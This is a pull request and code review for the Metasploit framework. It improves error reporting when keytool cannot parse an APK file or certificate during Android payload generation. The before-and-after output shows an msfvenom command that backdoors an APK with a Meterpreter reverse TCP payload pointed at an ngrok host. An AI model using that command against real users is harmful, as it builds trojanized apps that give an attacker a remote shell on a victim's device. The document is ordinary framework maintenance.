### PR TITLE
Msf::Payload::Apk: raise if keytool cannot parse APK file or certificate

### PR DESCRIPTION
**Pull request by bcoles**
The `Msf::Payload::Apk.parse_orig_cert_data` method performed no validation of APK file data and silently hid errors from `keytool`, leading to ambiguous error messages, most notably: ```Error: undefined method `[]' for nil:NilClass```.

This PR allows `keytool` errors to be raised as a `RuntimeError` and adds some validation to the certificate parsing.

# Before

```
# touch asdf.apk
# ./msfvenom -x asdf.apk -p android/meterpreter/reverse_tcp LHOST=6.tcp.ngrok.io LPORT=17108 -o Paykick.apk
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: asdf.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: undefined method `[]' for nil:NilClass

```

# After

```
# touch asdf.apk
# ./msfvenom -x asdf.apk -p android/meterpreter/reverse_tcp LHOST=6.tcp.ngrok.io LPORT=17108 -o Paykick.apk
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: asdf.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: keytool could not parse APK file: keytool error: java.util.zip.ZipException: zip file is empty
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
```

The following issues are related. This PR does not "fix" these issues, but will at least allow more intuitive error messages to narrow down the cause of the issue. The vast majority of these issues were never resolved and eventually grew stale, likely because the error message was too obtuse to determine the root cause of the issue. In many instances the user did not provide additional information. It was not their fault that the error message output was useless.

* #10079
* #15376
* #15151
* #14573
* #14454
* #14452
* #14004
* #13587
* #13504
* #12803
* #10667
* #10656
* #10581
* #8887
* #7524

An honourable mention to this comment https://github.com/rapid7/metasploit-framework/issues/7524#issuecomment-259924145 from 6 years ago which implies that the underlying root cause of some of these issues may be related to system locale. I guess we'll find out, once more issues are created with better error message output.

### CODE REVIEW

**Comment by adfoster-r7** [comment]
## Release Notes

Improves validation for Android payloads to notify the user if a keytool error is present, such as being unable to parse the provided APK file or certificate

**Comment by bcoles** [comment]
Of course *after* you merge this I realise I should have used `.blank?` not `.empty?` :facepalm: 

The good news is that at least one of the bugs is now blatantly obvious.

`PayloadGenerator` calls `backdoor_apk` with minimal arguments:

https://github.com/rapid7/metasploit-framework/blob/47cdbea16fdf0f22cd24135ba5a687d21a943b5c/lib/msf/core/payload_generator.rb#L412

`backdoor_apk` defaults to `signature = true`:

https://github.com/rapid7/metasploit-framework/blob/47cdbea16fdf0f22cd24135ba5a687d21a943b5c/lib/msf/core/payload/apk.rb#L156

The certificate parsing falls over because the file is not signed:

```
Error: Could not extract certificate owner: Not a signed jar file
```

**Comment by adfoster-r7** [comment]
@bcoles Let me know if you want me to throw up a separate PR to swap that method around :+1:

**Comment by bcoles** [comment]
> @bcoles Let me know if you want me to throw up a separate PR to swap that method around +1

Thanks. Not a big deal in the short term. I may ninja patch it while fixing the signing issue.

**Comment by bcoles** [comment]
> > @bcoles Let me know if you want me to throw up a separate PR to swap that method around +1
> 
> Thanks. Not a big deal in the short term. I may ninja patch it while fixing the signing issue.

Fixed in #16283

**Pull request merged**
